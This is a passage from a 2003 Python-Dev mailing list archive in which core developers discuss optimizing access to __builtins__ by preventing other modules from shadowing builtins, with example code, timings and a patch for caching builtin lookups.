    global len                   # when this is allowed
    len = lambda x: 5       # is a bear

The task is much simpler if it can be known in advance that
the substitution is allowed (i.e. a module level switch like:
__fastbuiltins__ = True).


Raymond Hettinger


From jeremy@alum.mit.edu  Fri Mar 28 12:29:54 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 28 Mar 2003 07:29:54 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1048854593.23083.97.camel@localhost.localdomain>

On Thu, 2003-03-27 at 23:49, Guido van Rossum wrote:
> Frankly, I'm a bit confused by your post.  Maybe I don't understand
> what you're proposing?

Modules are modules, right?  That is, pickle.py and cPickle.so are both
represented as module objects at runtime.  A C extension can call
PyModule_GetDict() on any module.  If so, then any extension module can
add names to the __dict__ of any Python module.  The problem is that
modules expose their representation at the C API level (namespace
implemented as PyDictObject), so it's difficult to forbid things at the
C level.

Jeremy


From guido@python.org  Fri Mar 28 12:23:44 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:23:44 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Thu, 27 Mar 2003 21:51:13 PST."
 <20030328055113.GA30405@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <20030328055113.GA30405@glacier.arctrix.com>
Message-ID: <200303281223.h2SCNiU20028@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum wrote:
> > Though you probably would only want to warn when this is done to a .py
> > module -- C extensions should be exempt.
> 
> Exempt from poking or being poked?

From being poked.  Poking from C code can't really be prevented, but
isn't a problem.

> > And the warning should only warn about inserting names that are
> > actually builtins.
> 
> I have a rough patch.  The idea is to have the tp_setattro slot of modules
> check if the name being set is a builtin.  It seems to work but perhaps
> there are cases that make that approach invalid.  Time for bed now. :-)

SF?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:26:54 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:26:54 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 09:38:28 +0100."
 <3E840A04.6070700@lemburg.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <3E840A04.6070700@lemburg.com>
Message-ID: <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>

> > I'd be happy to proclaim that doing something like
> > 
> >   import X
> >   d = X.__dict__
> >   d["spam"] = 42    # or  exec "spam = 42" in d 
> > 
> > is always prohibited.
> 
> That would break lazy module imports such as the one I'm using
> in mx.Misc.LazyModule.py.

But you could rewrite LazyModule.py to use setattr(X, "spam", 42), right?

I don't think it's worth it to have a dict proxy that allows certain
keys to be set but not others.
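
For comparison, this is how new-style classes already behave: the
__dict__ seen from Python is a read-only proxy, and setattr() is the
only way in. A small sketch (the class C and the name spam are just
placeholders):

```python
class C(object):
    pass


# Writing through the class's __dict__ proxy is refused ...
try:
    C.__dict__["spam"] = 42
    proxy_error = None
except TypeError as exc:
    proxy_error = exc

# ... while setattr() goes through the type's setattr operation.
setattr(C, "spam", 42)
print(type(proxy_error).__name__, C.spam)
```

The proposal is for module globals to follow the same pattern, with the
setattr path free to warn about or reject particular names.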

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:30:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:30:16 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 10:31:30 +0100."
 <200303281031.30093.aleax@aleax.it>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <200303281031.30093.aleax@aleax.it>
Message-ID: <200303281230.h2SCUHh20080@pcp02138704pcs.reston01.va.comcast.net>

> > I don't see the problem.  Typically, C extension modules don't have
> > Python code that runs in their globals, so messing with a C
> > extension's globals from the outside has no bad effect on Python code.
> 
> It happens, though -- for code whose performance is not important,
> e.g. initialization and "resetting" kind of stuff, a PyRun_String can be
> SO much more concise and handier than meticulous expansion of
> basically the same things into tens of lines of C code... since
> "messing from the outside" happens after initialization, and the use
> cases I can easily find are all specifically DURING initialization, it may
> be that this problem is too rare to worry about, but, I'm not so sure.

I think this use case won't have a problem.  The C code has access to the
real dict, so PyRun_String() never knows that it's poking into a
module's globals.  Also this is done during module initialization.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Fri Mar 28 12:28:25 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 28 Mar 2003 13:28:25 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net> <3E840A04.6070700@lemburg.com> <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E843FE9.6030400@lemburg.com>

Guido van Rossum wrote:
>>>I'd be happy to proclaim that doing something like
>>>
>>>  import X
>>>  d = X.__dict__
>>>  d["spam"] = 42    # or  exec "spam = 42" in d 
>>>
>>>is always prohibited.
>>
>>That would break lazy module imports such as the one I'm using
>>in mx.Misc.LazyModule.py.
> 
> But you could rewrite LazyModule.py to use setattr(X, "spam", 42), right?

Sure.

> I don't think it's worth it to have a dict proxy that allows certain
> keys to be set but not others.

The question is: why make this complicated ?

If the programmer
enables __fast_builtins__ (or similar) in the module scope,
she should be aware that tweaking the module globals from the
outside won't have the desired effect.

-- 
Marc-Andre Lemburg
eGenix.com



From guido@python.org  Fri Mar 28 12:33:19 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:33:19 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 04:44:42 EST."
 <20030328094441.GA10818@hishome.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <20030328055113.GA30405@glacier.arctrix.com>
 <20030328094441.GA10818@hishome.net>
Message-ID: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>

> Does it check whether the name is in the standard __builtin__ module,
> or whether it is an attribute of whatever object is currently set as
> the module's __builtins__ attribute?

Only standard builtins need to be exempt, because the compiler isn't
going to optimize non-standard builtins.  That's because (a) there
won't be special opcodes that implement those builtins directly, and
(b) the bytecode compiler doesn't know the contents of __builtins__ so
it can't possibly know about nonstandard builtins anyway to generate a
LOAD_BUILTIN opcode.

BTW, I expect that nonstandard builtins will be ruled out in some
future version of the language, or will have to be declared
differently.  They are too confusing for the human reader of the code.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Fri Mar 28 12:34:53 2003
From: mcherm@mcherm.com (Michael Chermside)
Date: Fri, 28 Mar 2003 04:34:53 -0800
Subject: [Python-Dev] Re: Fast access to __builtins__
Message-ID: <1048854893.3e84416d25541@mcherm.com>

Raymond writes:
> I've already tried out a pure python proof-of-concept 

Does that mean that you can give us some idea what kind of
performance boost this actually resulted in?

-- Michael Chermside


From guido@python.org  Fri Mar 28 12:39:04 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:39:04 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 05:58:44 EST."
 <005d01c2f519$00acb020$aa11a044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <005d01c2f519$00acb020$aa11a044@oemcomputer>
Message-ID: <200303281239.h2SCd4K20135@pcp02138704pcs.reston01.va.comcast.net>

> Cool.  Any chance of getting your keynote slides on the net?

Yes, after the conference.

> > > From past rumblings, I gather that Python is moving
> > > towards preventing __builtins__ from being shadowed.
> > 
> > You must be misunderstanding.
> > 
> > The only thing I want to forbid is to stick a name in *another*
> > module's globals that would shadow a builtin.
> 
> Yes, that *is* different.  
> Allowing shadows means having to watch out for trees.

Being poetic?

> > The idea of forbidding module B in the first example is that the
> > optimizer is allowed to replace len(a) with a bytecode that calls
> > PyObject_Size() rather than looking up "len" in globals and builtins.
> > The optimizer should only be allowed to make this assumption if
> > careful analysis of an entire module doesn't reveal any possibility
> > that "len" can be shadowed
>  . . .
> > BTW this idea is quite old; I described it a few years ago under a
> > subject something like "low-hanging fruit".
> 
> The fruit is a bit high.  Doing a full module analysis means
> deferring the optimization for a second pass after all the code
> has already been generated.  It's doable, but much harder.

You're stuck in a one-pass compiler mindset.  We build a parse tree
for the entire module before we start generating bytecode.  We already
have tools to do namespace analysis for the entire tree (Jeremy added
these to implement nested scopes).
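
A rough sketch of this kind of whole-module check, assuming a modern
Python 3 and its standard ast module (both postdate this thread).  The
names _BindingFinder and shadowed_builtins are hypothetical, and this is
not the compiler's actual analysis: it ignores star imports, exec, and
pokes through globals() or from other modules.

```python
import ast
import builtins

class _BindingFinder(ast.NodeVisitor):
    """Collect names bound at module scope or declared 'global' anywhere."""

    def __init__(self):
        self.depth = 0                  # > 0 while inside a def or class body
        self.module_bound = set()
        self.declared_global = set()

    def _visit_scope(self, node):
        if self.depth == 0:
            self.module_bound.add(node.name)   # the def/class name itself
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    visit_FunctionDef = _visit_scope
    visit_AsyncFunctionDef = _visit_scope
    visit_ClassDef = _visit_scope

    def visit_Global(self, node):
        # Conservative: any 'global X' is treated as a possible rebinding of X.
        self.declared_global.update(node.names)

    def visit_Name(self, node):
        if self.depth == 0 and isinstance(node.ctx, ast.Store):
            self.module_bound.add(node.id)

    def visit_alias(self, node):
        # 'import a.b' binds 'a'; 'import a.b as c' binds 'c'.
        if self.depth == 0:
            self.module_bound.add((node.asname or node.name).split(".")[0])

def shadowed_builtins(source):
    """Return the builtin names that the module source may rebind."""
    finder = _BindingFinder()
    finder.visit(ast.parse(source))
    return (finder.module_bound | finder.declared_global) & set(dir(builtins))

SOURCE = """
def f(x):
    return len(x) + 10

def g():
    global len
    len = lambda x: 5
"""

print(shadowed_builtins(SOURCE))
```

With the f/g example from this thread as input, the only name reported
is len, so an optimizer following this rule would leave len(x) alone in
that module and could still special-case every other builtin.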

> def f(x):
>     return len(x) + 10       # knowing whether to optimize this
> 
> def g():
>     global len                   # when this is allowed
>     len = lambda x: 5       # is a bear
> 
> The task is much simpler if it can be known in advance that
> the substitution is allowed (i.e. a module level switch like:
> __fastbuiltins__ = True).

-1000.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:45:03 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:45:03 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of 28 Mar 2003 07:29:54 EST."
 <1048854593.23083.97.camel@localhost.localdomain>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <1048854593.23083.97.camel@localhost.localdomain>
Message-ID: <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>

> > Frankly, I'm a bit confused by your post.  Maybe I don't understand
> > what you're proposing?
> 
> Modules are modules, right?  That is, pickle.py and cPickle.so are both
> represented as module objects at runtime.  A C extension can call
> PyModule_GetDict() on any module.  If so, then any extension module can
> add names to the __dict__ of any Python module.  The problem is that
> modules expose their representation at the C API level (namespace
> implemented as PyDictObject), so it's difficult to forbid things at the
> C level.

Oh sure.  I don't think it's necessary to forbid things at the C API
level in the sense of making it impossible to do.  We'll just document
that C code shouldn't do that.  There's plenty that C code could do
but shouldn't because it breaks the world.

I don't expect there will be much C code in violation of this prohibition.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 12:48:42 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 07:48:42 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 13:28:25 +0100."
 <3E843FE9.6030400@lemburg.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <3E840A04.6070700@lemburg.com>
 <200303281226.h2SCQsc20058@pcp02138704pcs.reston01.va.comcast.net>
 <3E843FE9.6030400@lemburg.com>
Message-ID: <200303281248.h2SCmgP20200@pcp02138704pcs.reston01.va.comcast.net>

> The question is: why make this complicated ?
> 
> If the programmer enables __fast_builtins__ (or similar) in the
> module scope, she should be aware that tweaking the module globals
> from the outside won't have the desired effect.

I don't want programmers to have to add all sorts of magical
incantations to the top of their modules to guide the optimizer.
Today it's __fast_builtins__, tomorrow it's a promise that a class
won't be poked.

Poking a module from the outside is frequent enough, but poking names
that shadow builtins is extremely rare.  So almost all modules would
need __fast_builtins__, because it would almost always help.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Fri Mar 28 12:46:37 2003
From: barry@python.org (Barry Warsaw)
Date: Fri, 28 Mar 2003 07:46:37 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>

On Friday, March 28, 2003, at 07:33 AM, Guido van Rossum wrote:

> BTW, I expect that nonstandard builtins will be ruled out in some
> future version of the language, or will have to be declared
> differently.  They are too confusing for the human reader of the code.

When you say "nonstandard builtins", do you mean nonstandard names
or nonstandard values, or both?  E.g. assigning gettext.ugettext() to
builtin _() or setting open() to some debugging func.

I wouldn't want to completely disallow these, but I'd be happy if you
had to do something special and/or (more) explicit to make them work.

-Barry


From skip@pobox.com  Fri Mar 28 13:30:08 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 28 Mar 2003 07:30:08 -0600
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
References: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>
 <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
Message-ID: <16004.20064.67576.926961@montanaro.dyndns.org>

    Barry> ... or  setting open() to some debugging func.

    Barry> I wouldn't want to completely disallow these, but I'd be happy if
    Barry> you had to do something special and/or (more) explicit to make
    Barry> them work.

Like a compiler flag to disable the run-time optimization so your debugging
open() would be seen everywhere?

Sort of like Guido's observation about __fastbuiltins__ = True, the frequent
case (regular, optimized version of open()) should be the default, while the
exception requires programmer or user action.

Skip


From nas@python.ca  Fri Mar 28 13:47:34 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 28 Mar 2003 05:47:34 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <1048854593.23083.97.camel@localhost.localdomain>
 <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030328134734.GA30759@glacier.arctrix.com>

Guido van Rossum wrote:
> I don't think it's necessary to forbid things at the C API level in
> the sense of making it impossible to do.  We'll just document
> that C code shouldn't do that.

What about Python code that modifies the module's __dict__ directly?  For
example, using vars() or globals() to get a reference to it and doing
__setitem__ on it.  My warning code only catches assignments that go
through the module tp_setattro slot.  I suppose warning about direct
__dict__ poking would require a proxy object to wrap the module dict.
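
A minimal sketch of that gap, assuming a modern Python 3 where a
ModuleType subclass with __setattr__ stands in for the tp_setattro hook.
WarnOnShadow is a hypothetical name and this is not the warning patch
itself:

```python
import builtins
import types
import warnings

class WarnOnShadow(types.ModuleType):
    """Module type that warns when attribute assignment shadows a builtin."""

    def __setattr__(self, name, value):
        # Skip underscore names such as __doc__, which builtins also defines.
        if not name.startswith("_") and hasattr(builtins, name):
            warnings.warn(
                "shadowing builtin %r in module %s" % (name, self.__name__),
                stacklevel=2,
            )
        super().__setattr__(name, value)

mod = WarnOnShadow("demo")

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    mod.len = lambda x: 5        # goes through __setattr__, so it is warned about
    vars(mod)["open"] = None     # direct dict poke, bypasses the check entirely

print(len(caught), "warning(s) recorded")
```

Only the attribute assignment is caught; the write through vars() lands
in the same namespace without ever reaching the hook.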

  Neil


From guido@python.org  Fri Mar 28 14:26:11 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 09:26:11 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 07:46:37 EST."
 <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
References: <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
Message-ID: <200303281426.h2SEQB720449@pcp02138704pcs.reston01.va.comcast.net>

> > BTW, I expect that nonstandard builtins will be ruled out in some
> > future version of the language, or will have to be declared
> > differently.  They are too confusing for the human reader of the code.
> 
> When you say "nonstandard builtins", do you mean nonstandard names
> or nonstandard values, or both?  E.g. assigning gettext.ugettext()
> to builtin _() or setting open() to some debugging func.

Nonstandard names.  The compiler can't know what's in __builtin__,
but it can know the names of the official built-ins.

> I wouldn't want to completely disallow these, but I'd be happy if
> you had to do something special and/or (more) explicit to make them
> work.

"from __builtin__ import open" should do it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 28 14:33:19 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Mar 2003 09:33:19 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Fri, 28 Mar 2003 05:47:34 PST."
 <20030328134734.GA30759@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
 <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
 <1048854593.23083.97.camel@localhost.localdomain>
 <200303281245.h2SCj3n20179@pcp02138704pcs.reston01.va.comcast.net>
 <20030328134734.GA30759@glacier.arctrix.com>
Message-ID: <200303281433.h2SEXJq20499@pcp02138704pcs.reston01.va.comcast.net>

> > I don't think it's necessary to forbid things at the C API level in
> > the sense of making it impossible to do.  We'll just document
> > that C code shouldn't do that.
> 
> What about Python code that modifies the module's __dict__ directly?  For
> example, using vars() or globals() to get a reference to it and doing
> __setitem__ on it.  My warning code only catches assignments that go
> through the module tp_setattro slot.  I suppose warning about direct
> __dict__ poking would require a proxy object to wrap the module dict.

Yeah, that's another niggling issue.  It would be a shame if using
globals() or vars() anywhere in a module would disable this
optimization.  But we can't make these return a proxy either, because
they are frequently used with e.g. "exec ... in globals()".

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Fri Mar 28 15:19:15 2003
From: barry@python.org (Barry Warsaw)
Date: 28 Mar 2003 10:19:15 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <16004.20064.67576.926961@montanaro.dyndns.org>
References: <200303281233.h2SCXJO20101@pcp02138704pcs.reston01.va.comcast.net>
 <50AD9BA1-611B-11D7-98FE-003065EEFAC8@python.org>
 <16004.20064.67576.926961@montanaro.dyndns.org>
Message-ID: <1048864755.1753.3.camel@geddy>

On Fri, 2003-03-28 at 08:30, Skip Montanaro wrote:

> Like a compiler flag to disable the run-time optimization so your debugging
> open() would be seen everywhere?

Sure, that would work.  I'm still thinking about "from __builtin__
import open".  Part of the issue there is that you might not be sure
/which/ open is causing the problems.  But I agree that this is not a
common case; I don't even think it would be common programming practice
(i.e. my use case is primarily debugging).

-Barry

P.S. I don't actually poke _() into builtins :)


From python@rcn.com  Fri Mar 28 23:05:17 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 28 Mar 2003 18:05:17 -0500
Subject: [Python-Dev] Re: Fast access to __builtins__
References: <1048854893.3e84416d25541@mcherm.com>
Message-ID: <004b01c2f57e$7fb13700$bf11a044@oemcomputer>

[Raymond]
> > I've already tried out a pure python proof-of-concept 

[Michael Chermside]
> Does that mean that you can give us some idea what kind of
> performance boost this actually resulted in?

It depends on what you're timing but it is not a big win.

* Speed doubles in demo code that just makes references to globals
   but is much more modest when the builtins are called.  This shows
   that the call time is more significant than the reference time:

        def f(i):
            dict; hasattr; float; pow; list; range   # speed more than doubles
            hex(i); str(i); oct(i); int(i); float(i)    # 12% gain

*  Contrived examples show the best gains while code from real apps
    shows smaller improvements:

    def shuffle(random=random.random):     # 6% gain
        x = list('abcdefghijklmnopqrstuvwyz0123456789')
        for i in xrange(len(x)-1, 0, -1):
            j = int(random() * (i+1))
            x[i], x[j] = x[j], x[i]

* PyStone does not use any builtins.

* Scanning my own sources, it looks like some of the builtins
   almost never appear inside loops (dir, map, filter, zip, dict, range).
   The ones that are in loops usually do something simple (int, str,
   chr, len).  Either way, builtin access never seems to dominate
   the running time.  OTOH, maybe that's just the way I write code.
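
A comparison along these lines can be approximated with the standard
timeit module.  This is only a sketch for a modern Python 3, not the
proof-of-concept measured above; the function names are made up for
illustration, and the numbers will vary by interpreter version and
machine.

```python
import timeit

def refs_only():
    # Bare references: each is a global lookup that falls through to builtins.
    dict; hasattr; float; pow; list; range

def calls(i=7):
    # Lookups plus calls: the call cost is paid on top of each lookup.
    hex(i); str(i); oct(i); int(i); float(i)

def calls_prebound(i=7, hex=hex, str=str, oct=oct, int=int, float=float):
    # Same calls, with the builtins bound as locals at definition time,
    # which takes the global/builtin lookup out of the measured work.
    hex(i); str(i); oct(i); int(i); float(i)

if __name__ == "__main__":
    for fn in (refs_only, calls, calls_prebound):
        seconds = timeit.timeit(fn, number=200000)
        print("%-15s %.3f s" % (fn.__name__, seconds))
```

Comparing calls with calls_prebound isolates the lookup cost from the
call cost, which is the distinction drawn in the first bullet.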


Raymond Hettinger


From python@rcn.com  Sat Mar 29 07:11:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 29 Mar 2003 02:11:03 -0500
Subject: [Python-Dev] Fast access to __builtins__
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <005d01c2f519$00acb020$aa11a044@oemcomputer>
 <200303281239.h2SCd4K20135@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <001e01c2f5c2$5e490720$990ca044@oemcomputer>

> > The fruit is a bit high.  Doing a full module analysis means
> > deferring the optimization for a second pass after all the code
> > has already been generated.  It's doable, but much harder.
> 
> You're stuck in a one-pass compiler mindset.  We build a parse tree
> for the entire module before we start generating bytecode.  We already
> have tools to do namespace analysis for the entire tree (Jeremy added
> these to implement nested scopes).
 . . .
> > The task is much simpler if it can be known in advance that
> > the substitution is allowed (i.e. a module level switch like:
> > __fastbuiltins__ = True).
> 
> -1000.

Having ruled out a module level switch, the -O flag, and the -OO
flag, that leaves the namespace analysis of the entire tree or taking
an approach that doesn't change the bytecode.  

Taking the second approach, I've loaded a small patch for caching
lookups into the __builtins__ namespace:

       www.python.org/sf/711722

It's not as fast as using LOAD_CONST, but is safe in all but one
extreme case:  calling the function, having an intervening poke
into the __builtins__ module, and then calling the function again.
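
A toy pure-Python model of that behavior, written for a modern Python 3.
BuiltinCache is a hypothetical name; the actual patch works in C inside
the interpreter and is not reproduced here.

```python
import builtins

class BuiltinCache:
    """Toy per-function cache for lookups that fall through to builtins."""

    def __init__(self, func_globals):
        self.func_globals = func_globals
        self.cache = {}

    def lookup(self, name):
        # Globals are always consulted first, so shadowing globals still win.
        if name in self.func_globals:
            return self.func_globals[name]
        # Only the fall-through to the builtins namespace is cached.
        if name not in self.cache:
            self.cache[name] = getattr(builtins, name)
        return self.cache[name]

module_globals = {}
cache = BuiltinCache(module_globals)
original_len = builtins.len

first = cache.lookup("len")             # first "call": caches the real len
builtins.len = lambda obj: 5            # intervening poke into builtins
try:
    stale = cache.lookup("len")         # second "call": still the cached len
finally:
    builtins.len = original_len         # always restore the real builtin

module_globals["len"] = lambda obj: 0   # a shadowing global is seen at once
shadowed = cache.lookup("len")

print(stale is original_len, shadowed is module_globals["len"])
```

The second lookup returns the stale cached object, which is the one
extreme case described; a later shadowing global is still honored
because the globals check comes before the cache.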

I put the cache lookup in the safest possible place.  It can be made
twice as fast by putting it before the func_globals() lookup.  That 
works in all cases except:  calling the function, having an intervening 
shadowing global assignment, and then calling the function again.
This doesn't come up anywhere in the test suite, my own apps,
or apps I've downloaded.  Note, regular shadowing (before the first
function call) continues to work fine.

The bad news is that I've made many timings and found only modest
speed-ups in real code.  It turns out that access time for builtins is
less significant than the time to call and execute those builtins. 
But, every little bit helps.


Raymond Hettinger


From mal@lemburg.com  Sat Mar 29 11:09:46 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 29 Mar 2003 12:09:46 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <001e01c2f5c2$5e490720$990ca044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <005d01c2f519$00acb020$aa11a044@oemcomputer>
 <200303281239.h2SCd4K20135@pcp02138704pcs.reston01.va.comcast.net>
 <001e01c2f5c2$5e490720$990ca044@oemcomputer>
Message-ID: <3E857EFA.8010205@lemburg.com>

Raymond Hettinger wrote:
> The bad news is that I've made many timings and found only modest
> speed-ups in real code.  It turns out that access time for builtins is
> less significant than the time to call and execute those builtins. 
> But, every little bit helps.

Perhaps you ought to look into special casing calling builtins,
e.g. by adding a byte code CALL_BUILTIN ?!

Since the signatures of the builtins are known in advance, the
calling overhead could be reduced, though I'm not sure how much
more can be gained since the function call code was refactored.

Another idea which might be worth looking into is that of speeding
up parsing of C function call arguments, e.g. by caching the results
or adding fast paths for common combinations.

-- 
Marc-Andre Lemburg
eGenix.com



From python@rcn.com  Sat Mar 29 21:02:10 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 29 Mar 2003 16:02:10 -0500
Subject: [Python-Dev] Compiler treats None both as a constant and variable
Message-ID: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>

>>> def f():
 None  

>>> dis(f)
2           0 LOAD_GLOBAL              0 (None)
              3 POP_TOP             
              4 LOAD_CONST               0 (None)
              7 RETURN_VALUE 

>>> None = 1
<stdin>:1: SyntaxWarning: assignment to None
>>> f() == None
False


Is this a bug?
Should the compiler use the GLOBAL in both places?
Or, is it reasonable to use CONST in both places?


Raymond Hettinger


From tjreedy@udel.edu  Sat Mar 29 21:41:54 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Sat, 29 Mar 2003 16:41:54 -0500
Subject: [Python-Dev] Re: Compiler treats None both as a constant and variable
References: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
Message-ID: <b653p0$gbb$1@main.gmane.org>

"Raymond Hettinger" <raymond.hettinger@verizon.net> wrote in message
